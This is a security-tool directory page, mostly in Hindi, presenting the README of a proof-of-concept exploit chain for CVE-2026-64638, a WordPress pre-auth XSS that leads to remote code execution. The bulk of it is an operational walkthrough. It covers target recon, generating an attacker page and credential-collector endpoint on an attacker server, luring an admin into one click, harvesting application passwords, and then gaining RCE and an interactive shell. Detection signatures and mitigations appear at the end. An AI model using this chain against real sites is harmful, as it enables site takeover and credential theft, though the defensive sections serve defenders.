Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/mohwahyudi/poc-cve-2026-64638-
फ़िशिंग उपकरणपेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगसामाजिक इंजीनियरिंगरेड टीमिंग
GitHubmohwahyudi/poc-cve-2026-64638-

poc-CVE-2026-64638-

PoC एक्सप्लॉइट श्रृंखला WordPress प्री-ऑथ XSS से RCE तक, DOM क्लोबरिंग, REST JSONP/SOME, और प्लगइन अपलोड के माध्यम से, Docker लैब सत्यापन और इंटरैक्टिव शेल के साथ।

रिपॉजिटरी देखें
12 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

XSS2Shell — CVE-2026-64638 PoC

WordPress प्री-ऑथ XSS → RCE एक्सप्लॉइट श्रृंखला, जो pwn.ai के शोध पर आधारित है और ionsec.io पर प्रकाशित हुई है।

⚠️ कानूनी चेतावनी: केवल शैक्षिक उद्देश्यों और अधिकृत परीक्षण के लिए। केवल उन्हीं सिस्टम पर उपयोग करें जिनके स्वामी आप हैं या जिनके परीक्षण की स्पष्ट लिखित अनुमति आपके पास है।

लैब सत्यापन

चरणतकनीकस्थिति
1पार्सर डिफरेंशियल XSS (sanitize_user + ब्राउज़र पार्स गैप)✅ सत्यापित
2DOM क्लॉबरिंग (<area id=ajaxurl>, <div id=color-picker>)✅ सत्यापित
3लॉगिन पेज पर user-profile.js ऑटो-ट्रिगर✅ सत्यापित
4REST JSONP कॉलबैक डॉट ट्रैवर्सल की अनुमति देता है (window.opener.approve.click)✅ सत्यापित
5_method=GET + _envelope=1 ओवरराइड✅ सत्यापित
6एप्लिकेशन पासवर्ड चोरी (SOME)⚠️ एडमिन क्लिक की आवश्यकता है
7प्लगइन अपलोड → PHP निष्पादन (कोई एक्टिवेशन नहीं)⚠️ क्रेडेंशियल्स की आवश्यकता है

पूर्ण विवरण के लिए lab/VERIFICATION_REPORT.md देखें।

भेद्यता सारांश

एक्सप्लॉइट श्रृंखला (7 चरण)

root@kitploit:~
Step 1: Parser Differential XSS
  └─ sanitize_user() allows "< area>", "< div>", "< button>" (space after "<")
     Browser parses these as real HTML elements in login error message

Step 2: DOM Clobbering
  └─ <area id=ajaxurl>   → shadows window.ajaxurl (HTMLAreaElement)
     <div id=color-picker class=reset-pass-submit> → satisfies jQuery selectors
     <button class="wp-generate-pw color-option"> → delegated click handler

Step 3: user-profile.js Auto-Trigger
  └─ Enqueued on wp-login.php (line 1398)
     $('.reset-pass-submit button.wp-generate-pw').trigger('click') fires
     $.post(ajaxurl, ...) → target URL = area.href (attacker-controlled)

Step 4: REST API JSONP + SOME
  └─ _jsonp=window.opener.approve.click → Same Origin Method Execution
     _envelope=1 → bypass auth error, wrap response in 200
     wp_check_jsonp_callback: regex /[^\w\.]/ allows dot traversal

Step 5: Social Engineering (1 click)
  └─ Admin sees real /wp-admin/authorize-application.php page
     Clicks "Approve" → application password minted

Step 6: Credential Theft
  └─ Password appears in redirect query string → read by child window (same-origin)

Step 7: Plugin Upload → RCE
  └─ Upload plugin ZIP → extracted to /wp-content/plugins/{slug}/
     PHP files directly executable WITHOUT activation

त्वरित प्रारंभ

1. निर्भरताएँ इंस्टॉल करें

root@kitploit:~
pip install requests

2. टार्गेट की रिकॉन करें

root@kitploit:~
python3 xss2shell_poc.py --target https://wp-target.com --check

# With Burp Suite proxy
python3 xss2shell_poc.py --target https://wp-target.com --check --proxy http://127.0.0.1:8081

3. डॉकर लैब (परीक्षण के लिए)

root@kitploit:~
cd lab
docker-compose up -d
# WordPress 6.0.3 at http://localhost:8080
# Admin: admin / password123

4. लैब पर XSS वेक्टर सत्यापित करें

root@kitploit:~
python3 xss2shell_poc.py --target http://localhost:8080 --check --no-ssl

5. अटैकर पेज जनरेट करें

root@kitploit:~
python3 xss2shell_poc.py --target https://wp-target.com \
    --attacker-host https://your-server.com --generate-page

xss2shell_attacker.html और collect.php को अपने सर्वर पर अपलोड करें।

6. एडमिन को लिंक भेजें

एक लॉग-इन WordPress एडमिन को अटैकर पेज पर जाकर एक बार क्लिक करना होगा।

7. क्रेडेंशियल्स प्राप्त करें

क्रेडेंशियल्स आपके सर्वर पर collected_creds.json में दिखाई देते हैं:

root@kitploit:~
[
  {
    "timestamp": "2026-08-08T...",
    "username": "admin",
    "password": "AbCd 1234 EfGh 5678",
    "site": "https://wp-target.com"
  }
]

8. RCE श्रृंखला निष्पादित करें

root@kitploit:~
python3 xss2shell_poc.py --target https://wp-target.com \
    --username admin --app-password "AbCd 1234 EfGh 5678" --rce

9. इंटरैक्टिव शेल

root@kitploit:~
python3 xss2shell_poc.py --target https://wp-target.com \
    --username admin --app-password "AbCd 1234 EfGh 5678" --shell

10. क्लीनअप

root@kitploit:~
python3 xss2shell_poc.py --target https://wp-target.com \
    --username admin --app-password "AbCd 1234 EfGh 5678" --cleanup

डिटेक्शन (लॉग फोरेंसिक)

सर्वर लॉग में खोजने योग्य हस्ताक्षर:

  • एक्सेस लॉग: ऐसी बॉडी के साथ POST /wp-login.php जिसमें < area, < div, < button हों
  • एक्सेस लॉग: क्वेरी पैरामीटर _jsonp= वाला REST अनुरोध (विशेष रूप से _jsonp=a.b.c — डॉट ही SOME का संकेत है)
  • एक्सेस लॉग: उन रूट्स पर _envelope=1 + _method=GET जिन्हें इन्हें अस्वीकार कर देना चाहिए
  • एक्सेस लॉग: अपरिचित IP से POST /wp-admin/update.php?action=upload-plugin
  • एक्सेस लॉग: GET /wp-content/plugins/{unknown-plugin}/*.php — कभी एक्टिवेट न किए गए प्लगइन में PHP फ़ाइल
  • ऐप लॉग: authorize-application.php पर किए गए अनुरोध के कुछ ही सेकंड के भीतर एप्लिकेशन पासवर्ड बनाया गया

शमन उपाय

  1. पैच WordPress 7.0.3 (या अपनी ब्रांच के लिए नवीनतम पॉइंट रिलीज़) तक करें
  2. सभी एडमिनिस्ट्रेटर एप्लिकेशन पासवर्ड रोटेट करें
  3. एप्लिकेशन पासवर्ड अक्षम करें यदि आवश्यक न हो:
    root@kitploit:~
    add_filter('wp_is_application_passwords_available', '__return_false');
    
  4. REST JSONP अक्षम करें:
    root@kitploit:~
    add_filter('rest_jsonp_enabled', '__return_false');
    
  5. फ़ाइल संशोधन अक्षम करें:
    root@kitploit:~
    define('DISALLOW_FILE_MODS', true);
    
  6. WAF नियम: REST एंडपॉइंट्स पर _jsonp=, _envelope= ब्लॉक करें; wp-login.php पर POST बॉडी में < area ब्लॉक करें

फ़ाइल संरचना

root@kitploit:~
xss2shell/
├── README.md                      # Documentation (this file)
├── xss2shell_poc.py               # Main PoC script
├── xss2shell_attacker.html        # Generated attacker page
├── collect.php                    # Credential collector endpoint
└── lab/
    ├── docker-compose.yml         # Docker lab (WP 6.0.3)
    ├── VERIFICATION_REPORT.md     # Step-by-step verification
    ├── test_sanitize.php          # sanitize_user() tests
    ├── test_full_payload.php      # Full payload chain test
    ├── test_browser.html          # DOM clobbering browser test
    ├── test_end_to_end.php        # End-to-end PHP test
    └── verify_xss.sh              # Automated curl tests

संदर्भ

  • IonSec — XSS2Shell: WordPress Pre-Auth XSS to RCE
  • pwn.ai — मूल खोज
  • WordPress सुरक्षा रिलीज़
टूल डाउनलोड करें
आइटमविवरण
CVECVE-2026-64638
CVSS 4.08.9
प्रभावितWordPress 4.7 – 7.0.2 (अनपैच किए गए पॉइंट रिलीज़)
फिक्सWordPress 7.0.3 (6 अगस्त, 2026), सभी मेंटेनेंस ब्रांचेज़ में बैकपोर्ट किया गया
प्रमाणीकरणप्री-ऑथ (बिना प्रमाणीकरण वाला XSS)
प्रभावप्लगइन अपलोड के माध्यम से RCE